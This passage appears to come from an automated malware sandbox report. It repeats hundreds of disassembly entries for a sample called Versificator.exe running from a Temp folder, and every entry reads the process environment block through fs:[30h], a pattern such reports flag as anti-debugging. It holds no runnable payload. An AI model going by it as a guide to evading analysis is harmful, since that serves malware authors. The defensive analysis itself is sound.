            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E59C mov eax, dword ptr fs:[00000030h]11_2_2126E59C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212325E0 mov eax, dword ptr fs:[00000030h]11_2_212325E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C5ED mov eax, dword ptr fs:[00000030h]11_2_2126C5ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C5ED mov eax, dword ptr fs:[00000030h]11_2_2126C5ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E5CF mov eax, dword ptr fs:[00000030h]11_2_2126E5CF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E5CF mov eax, dword ptr fs:[00000030h]11_2_2126E5CF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212365D0 mov eax, dword ptr fs:[00000030h]11_2_212365D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A5D0 mov eax, dword ptr fs:[00000030h]11_2_2126A5D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A5D0 mov eax, dword ptr fs:[00000030h]11_2_2126A5D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C427 mov eax, dword ptr fs:[00000030h]11_2_2122C427
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A430 mov eax, dword ptr fs:[00000030h]11_2_2126A430
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC460 mov ecx, dword ptr fs:[00000030h]11_2_212BC460
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA456 mov eax, dword ptr fs:[00000030h]11_2_212EA456
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125245A mov eax, dword ptr fs:[00000030h]11_2_2125245A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212364AB mov eax, dword ptr fs:[00000030h]11_2_212364AB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212644B0 mov ecx, dword ptr fs:[00000030h]11_2_212644B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BA4B0 mov eax, dword ptr fs:[00000030h]11_2_212BA4B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA49A mov eax, dword ptr fs:[00000030h]11_2_212EA49A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212304E5 mov ecx, dword ptr fs:[00000030h]11_2_212304E5
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C720 mov eax, dword ptr fs:[00000030h]11_2_2126C720
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C720 mov eax, dword ptr fs:[00000030h]11_2_2126C720
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126273C mov eax, dword ptr fs:[00000030h]11_2_2126273C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126273C mov ecx, dword ptr fs:[00000030h]11_2_2126273C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126273C mov eax, dword ptr fs:[00000030h]11_2_2126273C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AC730 mov eax, dword ptr fs:[00000030h]11_2_212AC730
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C700 mov eax, dword ptr fs:[00000030h]11_2_2126C700
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230710 mov eax, dword ptr fs:[00000030h]11_2_21230710
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21260710 mov eax, dword ptr fs:[00000030h]11_2_21260710
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238770 mov eax, dword ptr fs:[00000030h]11_2_21238770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240770 mov eax, dword ptr fs:[00000030h]11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126674D mov esi, dword ptr fs:[00000030h]11_2_2126674D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126674D mov eax, dword ptr fs:[00000030h]11_2_2126674D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126674D mov eax, dword ptr fs:[00000030h]11_2_2126674D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230750 mov eax, dword ptr fs:[00000030h]11_2_21230750
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BE75D mov eax, dword ptr fs:[00000030h]11_2_212BE75D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272750 mov eax, dword ptr fs:[00000030h]11_2_21272750
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272750 mov eax, dword ptr fs:[00000030h]11_2_21272750
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B4755 mov eax, dword ptr fs:[00000030h]11_2_212B4755
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212307AF mov eax, dword ptr fs:[00000030h]11_2_212307AF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E47A0 mov eax, dword ptr fs:[00000030h]11_2_212E47A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D678E mov eax, dword ptr fs:[00000030h]11_2_212D678E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212527ED mov eax, dword ptr fs:[00000030h]11_2_212527ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212527ED mov eax, dword ptr fs:[00000030h]11_2_212527ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212527ED mov eax, dword ptr fs:[00000030h]11_2_212527ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BE7E1 mov eax, dword ptr fs:[00000030h]11_2_212BE7E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212347FB mov eax, dword ptr fs:[00000030h]11_2_212347FB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212347FB mov eax, dword ptr fs:[00000030h]11_2_212347FB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123C7C0 mov eax, dword ptr fs:[00000030h]11_2_2123C7C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B07C3 mov eax, dword ptr fs:[00000030h]11_2_212B07C3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E627 mov eax, dword ptr fs:[00000030h]11_2_2124E627
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21266620 mov eax, dword ptr fs:[00000030h]11_2_21266620
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268620 mov eax, dword ptr fs:[00000030h]11_2_21268620
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123262C mov eax, dword ptr fs:[00000030h]11_2_2123262C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE609 mov eax, dword ptr fs:[00000030h]11_2_212AE609
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124260B mov eax, dword ptr fs:[00000030h]11_2_2124260B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272619 mov eax, dword ptr fs:[00000030h]11_2_21272619
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F866E mov eax, dword ptr fs:[00000030h]11_2_212F866E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F866E mov eax, dword ptr fs:[00000030h]11_2_212F866E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A660 mov eax, dword ptr fs:[00000030h]11_2_2126A660
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A660 mov eax, dword ptr fs:[00000030h]11_2_2126A660
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21262674 mov eax, dword ptr fs:[00000030h]11_2_21262674
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124C640 mov eax, dword ptr fs:[00000030h]11_2_2124C640
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C6A6 mov eax, dword ptr fs:[00000030h]11_2_2126C6A6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212666B0 mov eax, dword ptr fs:[00000030h]11_2_212666B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234690 mov eax, dword ptr fs:[00000030h]11_2_21234690
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234690 mov eax, dword ptr fs:[00000030h]11_2_21234690
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE6F2 mov eax, dword ptr fs:[00000030h]11_2_212AE6F2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE6F2 mov eax, dword ptr fs:[00000030h]11_2_212AE6F2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE6F2 mov eax, dword ptr fs:[00000030h]11_2_212AE6F2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE6F2 mov eax, dword ptr fs:[00000030h]11_2_212AE6F2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B06F1 mov eax, dword ptr fs:[00000030h]11_2_212B06F1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B06F1 mov eax, dword ptr fs:[00000030h]11_2_212B06F1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A6C7 mov ebx, dword ptr fs:[00000030h]11_2_2126A6C7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A6C7 mov eax, dword ptr fs:[00000030h]11_2_2126A6C7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B892A mov eax, dword ptr fs:[00000030h]11_2_212B892A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C892B mov eax, dword ptr fs:[00000030h]11_2_212C892B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE908 mov eax, dword ptr fs:[00000030h]11_2_212AE908
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE908 mov eax, dword ptr fs:[00000030h]11_2_212AE908
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC912 mov eax, dword ptr fs:[00000030h]11_2_212BC912
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228918 mov eax, dword ptr fs:[00000030h]11_2_21228918
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228918 mov eax, dword ptr fs:[00000030h]11_2_21228918
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21256962 mov eax, dword ptr fs:[00000030h]11_2_21256962
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21256962 mov eax, dword ptr fs:[00000030h]11_2_21256962
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21256962 mov eax, dword ptr fs:[00000030h]11_2_21256962
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127096E mov eax, dword ptr fs:[00000030h]11_2_2127096E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127096E mov edx, dword ptr fs:[00000030h]11_2_2127096E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127096E mov eax, dword ptr fs:[00000030h]11_2_2127096E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D4978 mov eax, dword ptr fs:[00000030h]11_2_212D4978
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D4978 mov eax, dword ptr fs:[00000030h]11_2_212D4978
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC97C mov eax, dword ptr fs:[00000030h]11_2_212BC97C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0946 mov eax, dword ptr fs:[00000030h]11_2_212B0946
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304940 mov eax, dword ptr fs:[00000030h]11_2_21304940
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A0 mov eax, dword ptr fs:[00000030h]11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212309AD mov eax, dword ptr fs:[00000030h]11_2_212309AD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212309AD mov eax, dword ptr fs:[00000030h]11_2_212309AD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B89B3 mov esi, dword ptr fs:[00000030h]11_2_212B89B3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B89B3 mov eax, dword ptr fs:[00000030h]11_2_212B89B3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B89B3 mov eax, dword ptr fs:[00000030h]11_2_212B89B3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BE9E0 mov eax, dword ptr fs:[00000030h]11_2_212BE9E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212629F9 mov eax, dword ptr fs:[00000030h]11_2_212629F9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212629F9 mov eax, dword ptr fs:[00000030h]11_2_212629F9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C69C0 mov eax, dword ptr fs:[00000030h]11_2_212C69C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A9D0 mov eax, dword ptr fs:[00000030h]11_2_2123A9D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212649D0 mov eax, dword ptr fs:[00000030h]11_2_212649D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FA9D3 mov eax, dword ptr fs:[00000030h]11_2_212FA9D3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov eax, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov eax, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov eax, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov ecx, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov eax, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252835 mov eax, dword ptr fs:[00000030h]11_2_21252835
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A830 mov eax, dword ptr fs:[00000030h]11_2_2126A830
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D483A mov eax, dword ptr fs:[00000030h]11_2_212D483A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D483A mov eax, dword ptr fs:[00000030h]11_2_212D483A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC810 mov eax, dword ptr fs:[00000030h]11_2_212BC810
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BE872 mov eax, dword ptr fs:[00000030h]11_2_212BE872
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BE872 mov eax, dword ptr fs:[00000030h]11_2_212BE872
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6870 mov eax, dword ptr fs:[00000030h]11_2_212C6870
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6870 mov eax, dword ptr fs:[00000030h]11_2_212C6870
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21242840 mov ecx, dword ptr fs:[00000030h]11_2_21242840
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21260854 mov eax, dword ptr fs:[00000030h]11_2_21260854
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234859 mov eax, dword ptr fs:[00000030h]11_2_21234859
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234859 mov eax, dword ptr fs:[00000030h]11_2_21234859
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230887 mov eax, dword ptr fs:[00000030h]11_2_21230887
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC89D mov eax, dword ptr fs:[00000030h]11_2_212BC89D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FA8E4 mov eax, dword ptr fs:[00000030h]11_2_212FA8E4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C8F9 mov eax, dword ptr fs:[00000030h]11_2_2126C8F9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C8F9 mov eax, dword ptr fs:[00000030h]11_2_2126C8F9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E8C0 mov eax, dword ptr fs:[00000030h]11_2_2125E8C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213008C0 mov eax, dword ptr fs:[00000030h]11_2_213008C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125EB20 mov eax, dword ptr fs:[00000030h]11_2_2125EB20
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125EB20 mov eax, dword ptr fs:[00000030h]11_2_2125EB20
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F8B28 mov eax, dword ptr fs:[00000030h]11_2_212F8B28
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F8B28 mov eax, dword ptr fs:[00000030h]11_2_212F8B28
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304B00 mov eax, dword ptr fs:[00000030h]11_2_21304B00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AEB1D mov eax, dword ptr fs:[00000030h]11_2_212AEB1D
